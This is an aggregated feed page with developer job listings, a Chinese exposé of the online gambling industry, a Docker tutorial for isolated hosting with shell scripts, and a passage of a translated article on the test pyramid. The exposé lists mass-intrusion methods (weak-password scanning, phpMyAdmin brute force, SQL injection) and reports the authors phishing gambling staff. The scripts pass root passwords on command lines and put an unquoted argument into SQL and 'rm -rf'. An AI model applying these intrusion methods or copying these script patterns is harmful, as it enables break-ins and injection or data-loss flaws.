          ODOO v11.0 - Need to select "allow Reconciliation" for all accounts with existing posted entries - with force re computation of amount_residual      Cache   Translate Page      
I have posted entries in our Odoo ERP but did not set "allow reconciliation" to True before posting them. I need to set all accounts to "allow reconciliation" so that I can reconcile them all with the bank... (Budget: $10 - $30 USD, Jobs: ERP, MySQL, PHP, Python, Software Architecture)
          Database import and uploading of a site      Cache   Translate Page      
Database import and uploading of a site. The first task is simple: import a very large (7+ GB) database into MySQL, then activate the site (the data has already been transferred to the FTP). (Budget: $30 - $250 USD, Jobs: Database Administration, Database Programming, HTML, MySQL, PHP)
          hi need POS billing software ASAP may be you can use floreant POS or any technology but need ASAP      Cache   Translate Page      
Hi, I need POS billing software ASAP. You can use Floreant POS or any other technology, but I need it ASAP. If you use Floreant POS, that's fine; if you use some other billing software, then I need the Floreant UI and the print design, which I will also send you... (Budget: ₹1500 - ₹12500 INR, Jobs: .NET, C# Programming, MySQL, PHP, Software Architecture)
          Build a Website with Database Connectivity      Cache   Translate Page      
I need to build a website from scratch... It should have 3 types of login portals. Please only apply if you have knowledge of database connectivity, conditional forwarding, JavaScript, and front-end design... (Budget: ₹1500 - ₹12500 INR, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Code fix for a MySQL query      Cache   Translate Page      
Hello, I am creating a query from a... - Source: www.forosdelweb.com
          Need Codeigniter Developer at 1k/day urgently      Cache   Translate Page      
Need Codeigniter Developer at 1k/day urgently (Budget: $2 - $8 USD, Jobs: Codeigniter, HTML, MySQL, PHP, Website Design)
          Create a view for a custom post type in WordPress      Cache   Translate Page      
I am using cptui plugin and have create a post type and have some custom fields in it. I need that content to be displayed in this layout on the front end https://www.globalservants.org/index.php/ministries/radio... (Budget: $10 - $30 USD, Jobs: CSS, HTML, MySQL, PHP, WordPress)
          Write JAVA wrapper for ERC20 integration      Cache   Translate Page      
The wrapper has to be generic, DB based. Where we can add required fields and configurations to integrate new ERC20 tokens in future. For now, TUSD integration is to be done by the freelancer. You'll get support from in-house tech team guiding about the architecture... (Budget: $30 - $250 USD, Jobs: Ethereum, Java, Javascript, MySQL, Software Architecture)
          core php developer      Cache   Translate Page      
core php developer needed full time (Budget: $750 - $1500 USD, Jobs: HTML, Javascript, MySQL, PHP, Website Design)
          Web Developer - PCA Ingenieria - Palmira, Valle del Cauca      Cache   Translate Page      
Web developer wanted, with experience working with PHP, MySQL, CSS and JavaScript. Ideally has worked with some PHP framework, XML, JSON, REST APIs....
From PCA Ingenieria - Sat, 22 Sep 2018 16:32:33 GMT - View all jobs in Palmira, Valle del Cauca
          PHP or Node.js Development
Web1Experts - Mohali, Punjab - Chandigarh - Looking for experience PHP or Node.js developer having at least 1+ year of experience, expert in API's development, MongoDB & MySQL.... Experience with PHP 2 to 5 years Experience with Node.js 1 to 4 years Responsibilities and Duties API development with Node.js, MongoDB/MySQL...
          PHP Developer
Property Megamart realty pvt ltd. - Mumbai, Maharashtra - Minimum Experience of 6 Months - 1 years Positions 1 Required Skills Knowledge of PHP 5 ( Object Oriented Programming) & MYSQL...
          Need experienced PHP developers
Technokrats. - Kolkata, West Bengal - Job Description Position: SR. PHP DEVELOPER Job Type:Full Time, Permanent. Experience:Min 1 yrs Skill:Sound in algorithm Core or Custom... Development in either of PHP, MySQL, JavaScript, AJAX And/or Knowing different other technologies like OPPs, MVC, CI, Zend, Yii And/or Sound in CMF...
          PHP and Wordpress Developer
APPTech Mobile Solution - Indore, Madhya Pradesh - and extending WordPress plugins. Must have experience of PHP/MySQL development. Must have very good experience in HTML 5, CSS, jQuery& AJAX... knowledge of IT skills. Must be proficient in PHP, MySQL, CSS, HTML, Cake php, custom php. CMS : WordPress Responsibilities and Duties Website...
          PHP Developer
GB Mainframe LLP - Kerala - Desired Experience: JavaScript, MySQL, REST, AJAX, PHP, HTML5 Responsibilities and Duties * 1 - 2 years of strong hands-on experience... on live projects with Core PHP, MySQl, JQuery & AJAX. * Should have fair knowledge in database structure and designing. * Should have fair...
          互联网毒瘤之网络博彩行业调查报告(上)

什么是网络博彩

什么是网络博彩呢,其实就是一种新型的通过网络进行的赌博。目前的网络博彩类型繁多(例如赌球、赌马、骰宝、轮盘、网上百家乐等),而现场操作比较复杂的方式就相对较少(例如扎金花、拉耗子等)。目前网络最火的平台有太阳城集团、威尼斯集团、捕鱼平台、大发彩票等等。在这里我向大家介绍目前主流的博彩行业内幕。

image

image

某个网络博彩公司运营架构图:

图中是某个博彩公司的运营架构图,我们可以直接看出,一个成熟的博彩平台是由多个产业链参与并聚集而来,技术开发、线上客服、线下推广代理等多种职能人员,并且重视网站和APP的安全,从主机安全到业务安全中的风控都已在博彩中得到应用且实现,核心团队一般都在境外,东南亚地区居多,博彩团队麻雀虽小五脏俱全,这个行业已形成规模化、集团化、分工细分化等特点。

image

主流的博彩第三方平台开发公司

这个行业由于比较特殊,所以博彩一般分为两部分,开发与运营一般是相互分开,相互独立的,开发公司只负责开发相应的系统,这样的公司可能是国内正规注册的公司,也可能是在境外的,不过境外一般是居多。

这是专门开发博彩软件系统playtech平台(境外):

image

还有向博彩平台提供技术支持的BBIN宝盈集团(境外):

image

开发与搭建一起的大发云(地区未知):

image

一个比较有实力,并提供在线赌场软件的平台 Microgaming:(境外)

image

常用的推广方式(广告推广、流量劫持、DNS 劫持、QQ 群与微信群传播、线上代理推广)

同一个网站配置多个域名

赌博性质的网站,安全软件通常会给出防毒警告,很大程度上影响了用户体验。

image

博彩运营人员为了防止出现防毒警告,通常会连续购买多个不同的域名。下图是某博彩从业人员的一个域名后台管理系统,一个网站可配置上百个域名进行解析,所有的域名都指向同一 ip 服务器。

image

image

建立色情网站引流

建立色情网站是这个行业保持持久流量的一个重要来源,这类网站主要针对目前的青年男性朋友。这类网站为了保持流量,其中的图片、视频等资源也会找第三方经常更新。

image

网站中充满了大量关于博彩的动态图片与链接,用户随便一点就可能进入到一个博彩网站中。

为了尽可能的逃避网安监管,这类网站的域名也会经常的更换。

image

第三方论坛广告

在论坛做广告,这是极为常见的方式,博彩广告主要分布在网赚类论坛、小说论坛、卡商类论坛。

image

image

在这些论坛中,每个论坛的广告位价格,都不一样,主要是按论坛的权重来计算广告位的价格。

名词解释:权重

网站的权重是指网站在搜索引擎排名中所占分量的高低。可以简单理解为:权重越高的论坛,带来的流量更高,排名也就更高。

这些广告基本上都是靠$砸出来的。下图是某权重为4的广告论坛广告价位表。

image

iMessage群发广告

iMessage代发组织。iMessage代发其实并不违法,但是一般的项目需求量很小,很难走量,利润低。而菠菜(博彩黑话)、微商、A货、信用卡,贷款等需求就很多,其中以博彩为最大。

image

当前,包括淘宝在内,目前行情价格是8分钱,起步1万,10万以上有折扣。而从淘宝某店家得知,Magiccc遇到的最新版本,直接可以通过短信下载APP的形式,目前还未普及。主要原因并不是技术方面,还是成本考虑,除了博彩公司,一般小打小闹的工作室做不了……

如果把线上博彩比作恶魔,那么iMessage代发中做博彩生意的,就是恶魔的使者。而Magiccc最后,准备会会这群恶魔…… 。

建立彩票计划

什么是计划?其实就是告诉你怎么样买可以稳赚不亏,跟着预先设定好的计划进行购买。还有人专门开发了自动帮你计算投注计划的软件。这其中会有一小部分人尝到甜头,但大部分人最后都是输得血本无归。

该软件会给出往期彩票开奖号,提供自动投注功能,只需要登上账号,然后开启自动投注功能,这个软件就可以自动的去投注彩票。直到把你账号的余额给投注完才会罢休。

image

其中一个倍投计划的介绍,意思就是:第一次买不中,第二次就买双倍,第二次买不中,第三次就买三倍,以此类推,直到中奖。一旦中奖之前所亏的,就会全部赢回来。但大部分人最后都是输的血本无归。

image

建立QQ群,论坛广告,自媒体推广等,免费发放彩票计划软件,其中的神圣计划,宝宝计划是目前最为火热。

image

image

美女利用人性弱点进行吸引流量,深入挖掘

除了主流的网络推广之外,这些博彩从业人员对人性的弱点也是非常了解,通过黑灰产非法购买公民用户资料,分析有一定经济实力的人群,进行深入挖掘,主要以男生作为目标。

http://imgsrc.baidu.com/forum/w%3D580/sign=05b4a76832d3d539c13d0fcb0a86e927/b5fcd158ccbf6c814c54ab7eb83eb13532fa4047.jpg

他们会加你QQ,微信等社交软件,刚开始只是与你普普通通的聊天。你并不会感觉有什么异样。

http://imgsrc.baidu.com/forum/w%3D580/sign=33583ea7a58b87d65042ab1737092860/7a3dfbf2b2119313303a732661380cd790238dad.jpg

他们会主动与男性聊天,无话不谈,聊的时间久了,你们之间会产生一些感情了。

http://imgsrc.baidu.com/forum/w%3D580/sign=d4c125589d25bc312b5d01906ede8de7/265a42a7d933c895287768edd51373f08302009d.jpg

等差不多的时候,就会露出马脚了,开始以各种方式,让你进行游戏,充值,比如:充值成功后并答应做你女朋友。你不会以为自己走桃花运了吧,但往往也是输得倾家荡产后,美女也不见了。

http://imgsrc.baidu.com/forum/w%3D580/sign=565ae57cd700baa1ba2c47b37711b9b1/a2aab31c8701a18b4eb13adf982f07082938fe42.jpg

可以参考:https://baijiahao.baidu.com/s?id=1579138638503696287&wfr=spider&for=pc

你不会就以为真的是美女在陪你聊吧,其实背后可能是这样。

image

入侵国内网站,放置暗链、流量劫持

为了快速上排行、引流,他们往往会高价招聘渗透、黑客等相关人才到境外工作,在境外入侵国内正规合法网站。受害网站主要为政府网站、学校网站和中小型企业网站。

image

image

国内某VPS服务器网站被插入暗链。

image

往往都是通过工具来非法入侵,获取网站控制权限。

目前主流批量化获取网站控制权通常有以下方法

  • 批量扫描弱口令(ssh,ftp,mysql,mssql,mongodb,rdp)等服务
  • 批量扫描备份文件
  • 批量利用最新安全漏洞exp脚本批量获取网站控制权限
  • 批量 phpmyadmin 暴力破解
  • 批量nginx/iis解析漏洞
  • 批量sql注入,提权漏洞,git漏洞

这些功能已被集成到一个叫Black Spider软件中,在黑市上被卖到2000,黑产利用这些工具一天可获取几百到上千个网站的控制权限。

image

image

第三方黑吃黑也随之兴起

入侵同行网站

入侵网站只有两个目的。

第一个目的就是获取同行网站的会员数据,拿回来的数据可以自己二次转化利用。

image

另外一个目的就是获取同行网站服务器权限,做流量劫持,修改同行网站代码,跳转到自己网站下,这早已是这个行业黑吃黑的普遍现象了。

image

image

修改同行网站数据

这种黑吃黑项目已逐渐的火热起来。但是技术成本还是比较高,在博彩中他们一样重视安全性。

image

image

博彩运营公司地区分布

在对网络博彩客服人员进行多次钓鱼攻击后发现,他们大部分 ip 来自境外,其中部分可能为代理 ip。由于博彩业在菲律宾是合法产业,只要是符合法律规定注册的都可以经营,所以许多公司都将网站后台服务、财务及运营点设在菲律宾等地。

东南亚地区成为网络博彩团队的主要据点。

image

后台赢利率是可控的

其中一个博彩后台系统,赢利率,玩法都是后台人员可控制的。

image

这个博彩平台的会员注册人数已经上万,流水惊人。

image

搭建一个平台需要的花费

这是专门搭建博彩网站公司客户人员。

image

我们了解过多个平台搭建费用,目前搭建一个博彩网站大概费用在2万元~5万元左右,后期每个月的安全维护费用在1.5万元左右,这还没有算上后期运营的人工成本,推广成本,公司成本,等等因素。要想踏入这个行业,深不可测。如果没有一定的经验,资金与团队是很难做下来的。

重新回顾下某某博彩运营架构图吧

image

 

同学们也可以参考以下链接:

http://www.freebuf.com/articles/network/175062.html

http://www.freebuf.com/news/topnews/167829.html

 

写在最后

随着黑灰产的快速崛起,我们能看到的只是互联网黑产的冰山一角,博彩也只是互联网黑产中的一小部分而已,简单的几篇文章无法讲清楚其中的内幕。大的博彩平台后面基本都有背景与靠山来维持,十赌九输是必然会发生的事情,不能抱有侥幸的心理。远离网络赌博,远离网络黑产,只有这样我们才是最大的赢家。


          使用 Docker 构建安全的虚拟空间

*本文作者:Li4n06,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

前言

最近上的某水课的作业是出 ctf web题目,然而大多数同学连 php 都没学过,(滑稽)更别说配置服务器了,于是我想能不能趁机赚一波外快 造福一下同学,(其实就是想折腾了)。所以打算把我自己的 vps 分成虚拟空间给大家用。但是一般的虚拟空间安全性难以得到保证,一个空间出问题,其他的用户可能都跟着遭殃,也就是旁站攻击。更何况我们这个虚拟空间的用处是 ctf web 题目,总不能让人做出一道题目就能顺手拿到所有题目的 flag 吧。于是想到了使用 docker 来构建安全的虚拟空间,其间遇到了不少问题,下面就是折腾的过程了。

image

实现思路

大体的思路是,在我的 vps 上为每个用户创建一个文件目录,然后将目录挂载到 docker 容器的默认网站目录,也就是 /var/www/html。用户可以通过 FTP 将网站源码上传到自己的文件目录,文件也会同步到容器内。这样就实现了各个空间的环境隔离,避免旁站攻击。

而数据库则可以单独构建一个 mysql 容器,为每个用户分配一个 user&database,让用户和空间容器来远程连接。

前期准备

选择镜像:

空间使用的镜像为:mattrayner/lamp:latest-1604(ubuntu 16.04 + apache2 + mysql,其实只要有 mysql-client 就可以了)

数据库所使用的镜像为:mysql:5(mysql 官方镜像)

配置FTP:

和配置常规的 FTP 没什么区别,这里特别强调3点:

一定要开启 chroot,防止不同用户之间可以互相查看文件;

如果使用被动模式,那么 云主机的安全组 或者iptables 不要忘了放行端口;

将 umask 设置为 022(这样用户上传的目录默认权限为 755,文件默认权限为 644)。
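umask 与默认权限的关系可以用一小段代码演示(这是一个示意性的例子,公式为:新文件权限 = 0666 & ~umask,新目录权限 = 0777 & ~umask):

```java
// 演示 umask=022 时新建文件/目录得到的默认权限
public class UmaskDemo {
    public static void main(String[] args) {
        int umask = 0022;                                                     // 上文 FTP 配置里的 umask
        System.out.println("file: " + Integer.toOctalString(0666 & ~umask)); // 文件 -> 644
        System.out.println("dir: "  + Integer.toOctalString(0777 & ~umask)); // 目录 -> 755
    }
}
```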

选择一个位置存放用户文件夹:

我这里新建一个 ~/rooms/ 来存放用户的文件夹。

配置数据库

1. 网络:

要让虚拟空间的容器能够远程连接数据库,首先要使容器之间在一个网段,那么我们就需要设置一个桥接模式的 docker network,我这里使用 172.22.0.0/16 这个网段。

$ docker network create --driver=bridge --subnet=172.22.0.0/16 room_net

2.创建 MySQL 容器:

我们的数据库需要满足:

允许用户远程连接;

允许空间容器连接。

第一点要求,我们通过将数据库容器的 3306 端口映射到 VPS 的开放端口即可,我这里映射到 3307。

第二点要求,只要通过我们刚刚设置的 docker network 即可实现。

所以启动创建容器的命令是的命令是:

$ docker run -d --name room-mysql --network room_net --ip 172.22.0.1 -p 3307:3306 -e MYSQL_ROOT_PASSWORD=your_password mysql:5

值得注意的一点是,root 用户是不需要远程登录的,出于安全考虑,我们应该禁止其通过 localhost 以外的 host 登录。

执行:

$ docker exec -it room-mysql /bin/bash -c "mysql -u root -p -e\"use mysql;update user set host='localhost' where user='root';delete from user where user='root' and host='%';flush privileges;\""

创建空间过程

做好前期的准备工作,我们就可以开始构建空间了,出于方便我们将整个过程编写成 shell 脚本,这样以后要新建空间的时候,只需要运行一下就可以了。

我们创建空间需要以下几个步骤:

1. 创建新的 FTP 用户

这个用户应该满足这样的要求:

可以上传文件到虚拟空间用户文件夹 (废话);

不能访问除虚拟空间用户文件夹之外的位置(在配置 FTP 时通过 chroot 实现);

创建的时候设置一个随机密码;

不能通过 ssh 登陆(其实这也是用户能通过 ftp 连接的必要条件。如果不限制的话,ftp 登录时会出现 530 错误)。

那么对应的 shell 脚本就是:

# /home/ubuntu/rooms/ 即你的 vps 上用来存放用户文件夹的位置
# $1 参数为要设置的用户名,也是虚拟空间容器&数据库用户&数据库&用户文件夹的名字
useradd -g ftp -d /home/ubuntu/rooms/$1 -m $1
pass=`cat /dev/urandom | head -n 10 | md5sum | head -c 10`  # 生成随机密码
echo $1:$pass | chpasswd                                    # 为用户设置密码
# 限制用户通过 ssh 登录(如 /etc/shells 里没有 /usr/sbin/nologin 需要自己加进去)
usermod -s /usr/sbin/nologin $1
echo "create ftp user:$1 identified by $pass"               # 输出用户名和密码

2. 新建数据库用户&数据库,并为用户赋权

这部分操作比较简单,我们就只需要为用户新建一个 MySQL 账户和一个专属数据库就好了。

shell 脚本:

# 让用户输入 mysql 容器的 root 密码
read -sp "请输入 MySQL 容器的 root 账户密码:" mysql_pass
# 创建数据库
docker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"create database $1;\""
# 生成密码
pass=`cat /dev/urandom | head -n 10 | md5sum | head -c 10`
# 创建 MySQL 用户
docker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"CREATE USER '$1'@'%' IDENTIFIED BY '$pass';\""
# 为用户赋予权限
docker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"grant all privileges on $1.* to '$1'@'%';flush privileges;\""
# 输出账户信息
echo "create database user:$1@'%' identified by $pass"

3. 新建空间

到现在我们已经可以创建空间容器了,想一想这个空间要满足什么基本要求呢?

能够外网访问;

能够连接数据库;

挂载用户文件夹内的文件到网站根目录。

那么命令就是:

$ docker run -d --name $1 --network room_net -p $2:80 -v /home/ubuntu/rooms/$1/www:/var/www/html mattrayner/lamp:latest-1604

但是作为一个用做虚拟空间的容器,我们还需要考虑 内存 的问题,如果不加限制,docker默认使用的最大内存就是 VPS 本身的内存,很容易被人恶意耗尽主机资源。

所以我们还要限制一下容器的最大使用内存。

关于 docker 容器内存使用的有趣的现象:

在最初,我把容器的内存限制到了 128m,然后访问网站发现 apache 服务没有正常启动,于是我把内存限制上调到了 256m,然后执行 docker stats 发现容器内存使用率接近100%;

有趣的是,当我尝试限制内存为 128m ,然后手动开启 apache 服务时,发现服务完全可以被正常启动,查看内存占用率,发现只占用了 30m 左右的内存。

为什么会出现这种情况呢?我大概猜想是因为容器内还有一些其他服务,当限制内存小于 256m 的时候,这些服务无法被同时启用,但是我们可以只启用 apache 啊!

于是命令变成了下面这样:

docker run -d --name $1 --cpus 0.25 -m 64m --network room_net -p $2:80 -v /home/ubuntu/rooms/$1/www:/var/www/html mattrayner/lamp:latest-1604
docker exec -it $1 /bin/bash -c "service apache2 start;"

最后一步,修改挂载文件夹的所有者:

到这时,理论上我们的空间已经可以正常使用了,可是我用 FTP 连接上去发现,并没有权限上传文件。

经过漫长的 debug 后发现,在容器启动一段时间后,我们挂载到容器内部的文件夹的所有者发生了改变,于是我查看了容器内部的 run.sh 脚本,发现了这样的内容:

if [ -n "$VAGRANT_OSX_MODE" ];then
    usermod -u $DOCKER_USER_ID www-data
    groupmod -g $(($DOCKER_USER_GID + 10000)) $(getent group $DOCKER_USER_GID | cut -d: -f1)
    groupmod -g ${DOCKER_USER_GID} staff
    chmod -R 770 /var/lib/mysql
    chmod -R 770 /var/run/mysqld
    chown -R www-data:staff /var/lib/mysql
    chown -R www-data:staff /var/run/mysqld
else
    # Tweaks to give Apache/PHP write permissions to the app
    chown -R www-data:staff /var/www
    chown -R www-data:staff /app
    chown -R www-data:staff /var/lib/mysql
    chown -R www-data:staff /var/run/mysqld
    chmod -R 770 /var/lib/mysql
    chmod -R 770 /var/run/mysqld
fi

可以看到,当没有设置 $VAGRANT_OSX_MODE 这个环境变量时,容器会修改 /app(/var/www/html 的软链接)文件夹的所有者为 www-data ,那么我们就需要在启动容器时,设置这个环境变量值为真。

而 /app 文件夹的默认所有者是 root 用户,我们将本地文件夹挂载到容器内的 /app 后,本地文件夹的所有者也会变为 root。所以我们还需要修改本地文件夹的所有者。

于是创建容器的 shell 脚本又变成了:

# 启动容器
docker run -d --name $1 --cpus 0.25 -m 64m --network room_net -p $2:80 -e VAGRANT_OSX_MODE=1 -v /home/ubuntu/rooms/$1/www:/var/www/html mattrayner/lamp:latest-1604
# 启动 apache2
docker exec -it $1 /bin/bash -c "service apache2 start;"
# 修改挂载文件夹的所有者
chown $1:ftp -R /home/ubuntu/rooms/$1/www

最后的脚本:

到现在创建空间的过程就结束了,那么贴上最后的脚本

创建空间脚本:

#!/bin/bash
# The shell to create new room
# Last modified by Li4n0 on 2018.9.25
# Usage:
#   option 1: database/dbuser/room/ftpuser/ name
#   option 2: port

# create new ftp user
useradd -g ftp -d /home/ubuntu/rooms/$1 -m $1
pass=`cat /dev/urandom | head -n 10 | md5sum | head -c 10`
echo $1:$pass | chpasswd
usermod -s /usr/sbin/nologin $1
echo "create ftp user:$1 identified by $pass"

# create new database
read -sp "请输入 MySQL 容器的 root 账户密码:" mysql_pass
docker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"create database $1;\""
pass=`cat /dev/urandom | head -n 10 | md5sum | head -c 10`
docker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"CREATE USER '$1'@'%' IDENTIFIED BY '$pass';\""
docker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"grant all privileges on $1.* to '$1'@'%';flush privileges;\""
echo "create database user:$1@'%' identified by $pass"

# create new room
docker run -d --name $1 --cpus 0.25 -m 64m --network room_net -p $2:80 -e VAGRANT_OSX_MODE=1 -v /home/ubuntu/rooms/$1/www:/var/www/html mattrayner/lamp:latest-1604
docker exec -it $1 /bin/bash -c "service apache2 start;"
chown $1:ftp -R /home/ubuntu/rooms/$1/www

删除空间脚本:

#!/bin/bash
read -sp "请输入 MySQL 容器的 root 账户密码:" mysql_pass
# drop the database
docker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"drop database $1\""
# delete dbuser
docker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"use mysql;drop user '$1'@'%';flush privileges;\""
# delete the container
docker stop $1
docker rm $1
# delete ftp user
userdel $1
rm -rf /home/ubuntu/rooms/$1

用法:

# 创建(参数:用户名 映射到 VPS 的端口)
sudo create_room.sh room1 10080
# 删除
sudo del_room.sh room1

总结

到这里我们就实现通过 docker 搭建较安全的虚拟空间了,当然,如果真的想上线运营,还有很多需要完善的地方,比如 空间大小的限制、用户文件和数据库的定时备份等等,有兴趣的朋友可以去自己完善。

那么到这里我的折腾就结束了,现在去卖空间给同学发福利了!

*本文作者:Li4n06,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

image


          测试金字塔实战 - 开发者头条

“测试金字塔”是一个比喻,它告诉我们要把软件测试按照不同粒度来分组。它也告诉我们每个组应该有多少测试。虽然测试金字塔的概念已经存在了一段时间,但一些团队仍然很难正确将它投入实践。本文重新审视“测试金字塔”最初的概念,并展示如何将其付诸实践。本文将告诉你应该在金字塔的不同层次上寻找何种类型的测试,如何实现这些测试。

2018 年 2 月 26 日 作者:Ham Vocke

Ham 是德国 ThoughtWorks 的一名软件开发和咨询师。由于厌倦了在凌晨 3 点手动部署软件,他开始持续交付实践,加紧自动化步伐,并着手帮助团队高效可靠地交付高质量软件。这样他就可以把省出来的时间用在别的有趣的事情上了。

目录
  • 测试自动化的重要性
  • 测试金字塔
  • 我们用到的工具和库
  • 应用例子
    • 功能
    • 整体架构
    • 内部架构
  • 单元测试
    • 什么是单元?
    • 社交和独处
    • 模拟和打桩
    • 测试什么?
    • 测试架构
    • 实现一个单元测试
  • 集成测试
    • 数据库集成
    • REST API 集成
    • 几个独立服务的集成
    • JSON 的解析和撰写
  • 契约测试
    • 消费者测试(我们团队)
    • 提供者测试(其他团队)
    • 提供者测试(我们团队)
  • UI 测试
  • 端到端测试
    • 用户界面端到端测试
    • REST API 端到端测试
  • 验收测试 – 你的功能工作正常吗?
  • 探索测试
  • 测试术语误解
  • 把测试放到部署流水线
  • 避免测试重复
  • 整洁测试代码
  • 结论

准备上生产环境的软件在上生产之前需要进行测试。随着软件开发行业的成熟,软件测试方法也日趋成熟。开发团队正在逐渐自动化大部分的测试,以此取代大量测试人员手工测试。通过自动化测试,开发团队可以分分钟就知道他们的软件是否被破坏,而不是后知后觉几天后才知道。

自动化测试极大地缩短了反馈周期,这与敏捷开发实践、持续集成、DevOps 文化等是一脉相承的。拥有高效的软件测试方法,可以让你的团队快速而自信地前行。

本文将探讨一个具备高响应力的、可靠并且可维护的测试组合应该如何构建,这与你具体构建的是一个微服务架构、移动应用程序或者物联网生态系统都无关。此外,我们还将详细介绍如何写出高效且可读的自动化测试。

(测试)自动化的重要性

软件已经成为我们日常生活中的一个重要组成部分。早期它仅仅用于提高企业的效率,但如今它的作用远不止如此。如今许多公司都想方设法成为一流的数字化公司。作为用户,我们每天使用的软件越来越多。创新的车轮正加速向前滚动。

如果你想跟上时代的步伐,你必须研究如何在不牺牲质量的情况下更快地交付你的软件。持续交付——一种高度自动化的、确保你可以随时将软件发布到生产环境中的实践——正能帮你达到这个目的。它通过构建流水线自动测试你的软件,自动将其部署到测试和生产环境中。

软件的数量正以前所未有的速度增长,手动进行构建、测试和部署,很快就会变得不可能——除非你想把所有的时间都用来进行手动重复的工作,而不是用来开发可工作的软件。将一切自动化,从构建到测试,从部署到基础架构,这是你唯一的出路。

(使用构建流水线来自动并可靠地将你的软件部署到生产环境)

传统的软件测试过于依赖手工操作:首先将应用程序部署到测试环境,然后执行一些黑盒测试,例如,通过点击用户界面来查看一切是否工作如常。通常这些测试将由文档指定,以确保测试人员每次测试的内容是一致的。

很明显,手动测试所有更改非常耗时、重复而且繁琐。重复很无趣,无趣就容易犯错,这样子还没测到这周工作结束你就会想找下一份工作了。

幸运的是,重复性劳动还是有药可治的:自动化。

自动化繁琐重复的测试将给软件开发人员的生活带来重大改变。自动化这些测试后,你就不需要再一味遵循测试文档点点点以确保软件是否仍正常工作。自动化这些测试,你可以充满自信地修改你的代码。如果你曾试过在没有适当自动化测试的情况下进行大规模重构,那你应该知道这种体验多么恐怖。你怎么知道你是否意外地破坏了某些功能呢?显然,你需要将所有的测试用例手动点一遍。不过老实说,你真的享受这个过程吗?你想象一下,如果你对代码做了大规模改动后惬意地喝了一口咖啡,喝完咖啡后就能马上得知你的改动有没有破坏原有功能。这样的开发体验是不是听起来就让人舒服多了?

测试金字塔

如果你真的想为你的软件构建自动化测试,你必须知道一个关键的概念:测试金字塔。Mike Cohn 在他的著作《Succeeding with Agile》一书中提出了这个概念。这个比喻非常形象,它让你一眼就知道测试是需要分层的。它还告诉你每一层需要写多少测试。

(测试金字塔)

根据 Mike Cohn 的测试金字塔,你的测试组合应该由以下三层组成(自下往上分别是):

  • 单元测试
  • 服务测试
  • 用户界面测试

不幸的是,如果你仔细思考就会发现,测试金字塔的概念有些不足。有人认为,Mike Cohn 的测试金字塔里的命名或某些概念不是最理想的。我也同意这一点。从当今的角度来看,测试金字塔似乎过于简单了,因此可能会产生误导。

然而,由于其简洁性,在建立你自己的测试组合时,测试金字塔本身是一条很好的经验法则。你最好记住 Cohn 测试金字塔中提到的两件事:

  • 编写不同粒度的测试
  • 层次越高,你写的测试应该越少

为了维持金字塔形状,一个健康、快速、可维护的测试组合应该是这样的:写许多小而快的单元测试。适当写一些更粗粒度的测试,写很少高层次的端到端测试。注意不要让你的测试变成冰淇淋那样子,这对维护来说将是一个噩梦,并且跑一遍也需要太多时间。

不要太拘泥于 Cohn 测试金字塔中各层次的名字。事实上,它们可能相当具有误导性:服务测试是一个难以掌握的术语(Cohn 本人说他观察到很多开发人员完全忽略了这一层)。在单页应用框架(如 react,angular,ember.js 等)的时代,UI 测试显然不必位于金字塔的最高层,你完全能够用这些框架对 UI 进行单元测试。

考虑到原始名称的缺点,只要在你的代码库和团队讨论中达成一致,你完全可以为测试层次提供其他名称。

我们将使用的工具和库

  • JUnit : 测试执行库
  • Mockito: 模拟依赖
  • Wiremock: 为外部服务打桩
  • Pact: 用于编写消费者驱动的契约测试
  • Selenium: 用于编写用户界面驱动的端到端测试
  • REST-assured: 用于编写 REST API 驱动的端到端测试

示例应用

我已经写好了一个简单的微服务应用,其中涵盖了测试金字塔各种层次的测试。

示例应用体现了一个典型的微服务的特点。它提供了一个 REST 接口,与数据库进行通信并从第三方 REST 服务中获取信息。它是使用 Spring Boot 实现的,即使你之前从未使用过 Spring Boot,它也简单到应该让你很容易理解。

请下载 Github 上的代码。Readme 里写了你在计算机上运行应用程序及其自动化测试所需的说明。

功能

应用的功能十分简单。它提供了三个 REST 接口:

  • GET /hello 总是返回”Hello World”
  • GET /hello/{lastname} 根据 lastname 来查询人,如果查到了结果将返回”Hello {Firstname} {Lastname}”
  • GET /weather 返回现在德国汉堡的天气情况

高层架构

从高层次来看,这个系统的结构是这样:

(我们微服务系统的高层架构)

我们的微服务提供了一个可以通过 HTTP 调用的 REST 接口。对于某些接口,服务将从数据库获取信息。在其他情况下,服务将通过 HTTP 调用外部天气 API来获取并显示当前天气状况。

内部架构

在内部,Spring Service 有一个典型的 Spring 架构:

(我们微服务的内部架构)

  • Controller 提供 REST 接口,处理 HTTP 请求和响应
  • Repository 和数据库打交道,关注数据在持久化存储里的读写操作
  • Client 和别的 API 交互,在我们的应用里它会通过 HTTPS 从 darksky.net 获取天气情况
  • Domain 这是我们的领域模型,它包含了领域逻辑(相对来说,在我们的示例中不甚重要)

有经验的 Spring 开发人员可能会注意到这里缺失了一个常用的层次:受Domain-Driven Design的启发,很多开发人员通常会构建一个由服务类组成的服务层。我决定不在这个应用中包含服务层。原因之一是我们的应用程序很简单,服务层只会成为一个不必要的中间层。另一个是我认为人们过度使用服务层。我经常遇到在服务类中写了全部业务逻辑的代码库。领域模型仅仅成为数据层,而不是行为(贫血域模型)。对于每一个稍有复杂度的应用来说,这浪费了很多让代码保持结构良好且易于测试的优秀方案,并且没能充分利用面向对象的威力。

我们的 repositories 非常简单,它提供简单的 CRUD 功能。为了保持代码简单,我使用了 Spring Data。 Spring Data 为我们提供了一个简单而通用的 CRUD 实现,我们可以直接使用而不需再造轮子。它还负责为我们的测试启动一个内存数据库,而不是像生产中一样使用真正的 PostgreSQL 数据库。

看看代码库,熟悉一下内部结构。这将有助于我们的下一步:测试我们的应用!

单元测试

单元测试将成为你测试组合的基石。你的单元测试保证了代码库里的某个单元(被测试的主体)能按照预期那样工作。单元测试在你的测试组合里测试的范围是最窄的。它的数量在测试组合中应该远远多于其他类型的测试。

(一个用测试替身隔绝了外部依赖的典型单元测试)

一个单元指的是什么?

